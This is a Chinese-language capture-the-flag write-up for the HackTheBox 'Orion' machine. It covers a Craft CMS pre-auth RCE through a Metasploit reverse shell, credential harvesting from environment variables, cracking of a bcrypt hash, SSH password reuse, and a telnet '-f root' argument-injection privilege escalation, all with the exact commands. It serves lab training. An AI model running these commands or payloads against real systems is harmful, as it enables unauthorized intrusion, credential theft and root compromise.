hackthebox-Orion

hackthebox-Orion

Foothold

fscan 扫描

有一个带域名的 302 跳转,配置一下 hosts

10.129.62.192 orion.htb

再次扫描

start infoscan
10.129.62.192:80 open
10.129.62.192:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://10.129.62.192      code:302 len:154    title:302 Found 跳转url: http://orion.htb/
[*] WebTitle http://orion.htb/         code:200 len:12272  title:Orion Telecom
[+] InfoScan http://orion.htb/         [CMS]
已完成 2/2
[*] 扫描结束,耗时: 2m4.559666451s

结合访问发现,是一个 CraftCMS

使用 searchsploit 发现一个 rce 漏洞

直接拉下来打

searchsploit -m 48492
python 48492.py -u http://10.129.62.192/orion.htb/

发现没有回显,说明没有利用成功

那就网上检索相关的漏洞

首先通过 /admin/login 路由找到 admin 登陆后台,发现服务版本为 Craft CMS 5.6.16

搜索发现存在 CVE-2025-32432 可以未授权 rce

https://www.exploit-db.com/exploits/52525
网上的 poc 的打法都略有区别,尝试了好几个都没打通

msf 中也有这个 cve 的利用

use exploit/linux/http/craftcms_preauth_rce_cve_2025_32432
set RHOSTS orion.htb 
set RPORT 80 
set LHOST 10.10.16.232
set LPORT 6666
run

有 python3,提一个 full tty shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

User token

进来以后发现权限是 www-data,先枚举一些常规的提权

suid 发现有 pkexec 和 polkit

确认 polkit 版本

dpkg -l policykit-1

版本小于 0.117,可以使用 pwnkit 进行提权

exit 到 meterpreter
upload ./PwnKit
shell
chmod +x ./PwnKit
./PwnKit

发现打不了,应该是被修补了

这是由于 Ubuntu 经常保留上游版本 0.105,只通过 Debian/Ubuntu 包修订号回移安全补丁,所以这里不能只看版本号

sudo 和 capablities 也没有有用的信息,因此考虑存在服务的信息泄露

上传 linpeas 进行枚举

chmod +x linpeas.sh
./linpeas.sh

环境变量中存在数据库信息

CRAFT_DB_SERVER=127.0.0.1
CRAFT_DB_PASSWORD=SuperSecureCraft123Pass!
CRAFT_DB_USER=root
CRAFT_DB_DATABASE=orion

3306 端口活跃

连接进去看看

mysql -h 127.0.0.1 -P 3306 -u root -p

查询发现 admin 账户

use orion;
show tables;
select * from users;

admin
adam@orion.htb
$2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/B42LUg0lS

给的密码是一个 bcrypt 哈希,可以尝试爆破一下

echo '$2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/B42LUg0lS' > hash.txt
john --wordlist=rockyou.txt hash.txt

darkangel

在 cms 上无法登录

考虑是一个密码复用,尝试用这个密码登录 adam

ssh adam@10.129.62.202 -p 22

成功登录,获取到 user token

Root token

下面继续尝试提权,由于这个账户拿到了密码,可以看看 sudo

没有 sudo 权限

那这里就要考虑服务的漏洞或者内核

此前查看活动端口时,会发现除了 3306 的 mysql,还有 23 和 53 两个端口

53 端口是 DNS,23 端口时 telnet,因此可以关注一下

telnet --version

发现版本为 telnet (GNU inetutils) 2.7,搜索发现版本满足 CVE-2026-24061

跟着网上找到的文章尝试攻击

USER='-f root' telnet -a 127.0.0.1 23

成功提权,拿到 root token

又积累了一个提权

posted @ 2026-07-19 14:27  xNftrOne  阅读(3)  评论(0)    收藏  举报